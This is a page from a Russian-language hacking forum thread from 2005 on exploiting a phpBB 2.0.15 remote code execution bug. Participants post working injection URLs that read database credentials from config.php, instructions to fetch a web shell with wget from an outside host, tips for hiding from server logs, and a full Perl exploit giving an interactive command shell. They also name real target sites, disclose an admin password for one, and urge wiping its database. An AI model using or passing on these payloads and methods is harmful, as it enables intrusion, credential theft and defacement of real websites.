ANTICHAT
Страница 2 из 3 < 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимости форумов phpbb 2.0.15 (https://forum.antichat.xyz/showthread.php?t=7527)

Dragunov 03.07.2005 15:51
Можешь дать номер своей аськи?

Rebz 03.07.2005 16:01
Нет
Пиши в ПМ, если что-то беспокоит..

Azazel 04.07.2005 23:19
Такое дело. Шелл вроде я залил,
Код:
rw-r--r--    1 u3603347 ftpusers    43265 Jun 30 17:38 search.php
rw-r--r--    1 u3603347 ftpusers        0 Jul  4 14:32 shell.php
rw-r--r--    1 u3603347 ftpusers    2958 Jul  4 14:32 shell.php.1
rw-r--r--    1 u3603347 ftpusers    2958 Jul  4 14:32 shell.php.2
rw-r--r--    1 u3603347 ftpusers    2958 Jul  4 14:32 shell.php.3
rw-r--r--    1 u3603347 ftpusers    2958 Jul  4 14:32 shell.php.4
rw-r--r--    1 u3603347 ftpusers    2958 Jul  4 14:32 shell.php.5
rwxr-xr-x    6 u3603347 ftpusers    4096 Jun 30 17:38 templates
rw-r--r--    1 u3603347 ftpusers        5 Jul  4 01:26 test.txt
rw-r--r--    1 u3603347 ftpusers      691 Nov 21  2004 update.php
rw-r--r--    1 u3603347 ftpusers    23154 Oct 19  2004 viewforum.php
rw-r--r--    1 u3603347 ftpusers    7233 May  9 19:42 viewonline.php
rw-r--r--    1 u3603347 ftpusers    45228 May  9 19:42 viewtopic.php
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?

Felix 06.07.2005 03:03
Цитата:
Сообщение от Rebz
Dragunov, максимум что ты получишь - пароли от БД. =))

их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).'

Запустил? Ничего не появилось?:)) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);
?>

Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.

для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.

Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.

зы: можно писать несколько команд через точку с запятой.
Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?

Rebz 06.07.2005 03:09
Azazel, а ты права доступа взглянул??:)) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..

Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!

Felix 07.07.2005 21:45
Цитата:
Сообщение от Rebz
Azazel, а ты права доступа взглянул??:)) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..

Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!

Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??

vorishka 07.07.2005 22:06
Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?

nopmoc 07.07.2005 22:30
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.

m0nzt3r 07.07.2005 23:40
>>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
=))))))))) лооооол это веб шел...набивай адрес в урл

vorishka 08.07.2005 00:09
Цитата:
Сообщение от nopmoc
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
А не прокатывает =( Выдает вот так:
../../:
cgi-bin
cgi-bin-dist
data
data-dist
error
error-dist
icons
icons-dist
И всё... ну что ещё мона зделать...

tester2005 08.07.2005 03:38
Цитата:
Сообщение от Azazel
Такое дело. Шелл вроде я залил,......
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
ГЫ: ага прям он те ща на тарелочке с добавкой =)
Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)

ProTeuS 08.07.2005 04:31
Цитата:
Сообщение от tester2005
ГЫ: ага прям он те ща на тарелочке с добавкой =)
Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...

bul666 08.07.2005 04:57
Цитата:
Сообщение от WeKSTiK
И у меня, всё работает на ура!!!
Покажи пример твоего запроса...

Всмысле че ты в командной строке писал

tester2005 08.07.2005 08:47
Цитата:
Сообщение от ProTeuS
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
Патти к ослу никак не относитса, так что взаимосвязки настроек прокситса настройками бровзера там нет, хотя не проверял...
Так что используй proxycap или proxifier которые туннелируют все твои исходяшие с машини коннекты...

и ваще это уже оффтоп, сдесь обсуждаетса эксплотация дыры в 2.0.15 а не добыча шелла на сервер

m0nzt3r 08.07.2005 11:59
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la

vorishka 08.07.2005 15:39
Цитата:
Сообщение от m0nzt3r
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls%20../../%20-la. Т.е. выходим на 2 каталога выше, и сморим права. Не отображается тока папки. Пишем ls%20../../%20;la, тоже.... ls%20../../%20;-la тоже...
Чё делать то может на какой сайтик дадите пример?

m0nzt3r 09.07.2005 00:11
а ты попробуй просто ls -la написать )) может так получится?

JayTi 16.07.2005 05:30
Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз

SanyaX 16.07.2005 05:56
Они должны стоят. Та качалка(wget) или другая (curl)!

exbbxak 16.07.2005 19:15
не хочу зоздавать новую тему просто отпишусь тут

на этом форуме www.hpforum.ru админ просто ...... его пасс gegcde и действуют все дыры, ему 2 недели назад посылали письмо о том как их закрыть а он говорит что типа и слышать об этом не хочет!!! короче там xss досихпор висит моно посмотреть через оперу в теме http://www.hpforum.ru/viewtopic.php?t=2&start=300 под ником exbb

m0nzt3r 17.07.2005 11:04
>>Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
а зачем гуид?пишешь wget ili curl ili fetch ili lynx и смотришь какая сработает..

m0nzt3r 17.07.2005 11:09
exbb прочитал =) идиоты ... а ты возьми грохни базу..задефейсни на фиг..че ты еще оправдывашься перед ними

exbbxak 17.07.2005 12:58
да не хочу просто уже связыватся пусть кто другой тренируется

KEZ 17.07.2005 13:32
Цитата:
пишешь wget ili curl ili fetch ili lynx и смотришь какая сработает..
Глупость однако.

which wget
which curl
which lynx
which fetch

wget --help
curl --help
lynx --help
fetch --help

Вот тебе и все параметры.

T-REX 21.07.2005 04:56
Как мне поменять права доступа.
Закачиваю шелл wget'ом и нихрена. :confused:

m0nzt3r 21.07.2005 13:14
Цитата:
Сообщение от KEZ
Глупость однако.
Согласен=)ступил)))))))
Цитата:
Сообщение от T-REX
Как мне поменять права доступа.
командой chmod

stalles 21.07.2005 17:35
такой вопросик где мона скачать эксплоит для phpbb 2.0.15

TIMaN 21.07.2005 22:30
Помогите пожалуйста ламеру
Второй день пытаюсь ломануть http://mariel.ru/forum Через кук не получается, внизу
сылка на админку есть, а ник админа не уводится. На форуме 3 админа.

T-REX 22.07.2005 02:49
m0nzt3r, Нужно цифрами вводить права доступа?
TIMaN, А я вобще этого сайта не вижу. :confused:

T-REX 22.07.2005 02:52
stalles, Я юзаю такой.
Код:
#!/usr/bin/perl
# Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
#
# phpBB 2.0.15 -re-bug in viewtopic.php
# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively  <---------  cvs, is also GPL
# or http://www.google.es/search?q=programming+howto
#
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
#
#
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: que todos los hackers digan YO!!
#
#
 

use strict;
use IO::Socket;

unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }

$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port  = 80 unless defined($port);
$server  = $1 unless defined($server);
my ($url, $command) = $2;

print "$server - $port - $url\n";

while () {
      print "phpBB2.0.15> ";
      while(<STDIN>) {
            $command=$_;
            chomp($command);
            last;
      }
      &send($command);
}

sub send {
    my $ok  =  0;
    my $cmd  = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
              "Host: $server\nPHP: $cmd\n\n\n\n";
    my $socket = IO::Socket::INET->new(PeerAddr => $server,
            PeerPort => $port,
            Proto    => "tcp",
            Type    => SOCK_STREAM)
            or die "can't connect to: $server : $@\n";
  print $socket $string;
  while(<$socket>) {
      if (/#PHPBBEXPLOIT#/) {
            close($socket) and last if $ok eq 2;
            $ok++;
            next;
      }
      print if $ok eq "1";
  }
}

stalles 22.07.2005 08:52
и чё с этим кодом делать? его нада компелить? видь на перле некомпелится!

GreenBear 22.07.2005 09:51
молица на этот код надо. писец =))
береш... копируеш... сохроняешь файл в *.pl...
в cmd пишеш путь к нему... путь к форуму... с топиком... например
дальше делаеш то что надо на сервере. можеш шел закачать для удобсва...
да, прежде чем делать, активперл установи -)

m0nzt3r 22.07.2005 11:28
Цитата:
Сообщение от T-REX
m0nzt3r, Нужно цифрами вводить права доступа?
да , надо

No fear 22.07.2005 12:06
Люди, как ломать форум на движке PHPbb ??? То что эксплойта там не надо я уже понял... Де можно взять программу PHPbb??? Спасибо.

TIMaN 22.07.2005 12:08
Извиняюсь, неправильно сылку написал
http://www.mariel.ru/forum/

m0nzt3r 22.07.2005 12:20
самы ломаемый форум это пхпбб а ты спрашиваешь как =))))))))))))))))))

GreenBear 22.07.2005 12:33
мне кажеца надо модерам удялть сообщения, по типу таких, как пишет тиман. а обычным юзверям игнорировать их. если людям влом тему прочитать, то это уже их проблемы.

No fear 22.07.2005 12:37
Я научился ломать форумы эксплойерам, теперь хочу познать искуство взлома форумов на движке РНРbb. Мне нужна помощ. Кто нибудь поможет? Научит? А я пока пойду видео качну. Объясните если не жалко.

Rebz 22.07.2005 12:51
задрал уже...

m0nzt3r 22.07.2005 12:52
Но Феар по любому все ломают эксплойерами))
а так вручную хочешь?иди на секлаб поиск пхпбб ... еще вот Задохлик недавно хсс опубликовал...вот это можно вручную а не эксплойерами))))


Время: 03:05
Страница 2 из 3 < 1 2 3 >
Показывать 40 сообщений этой темы на одной странице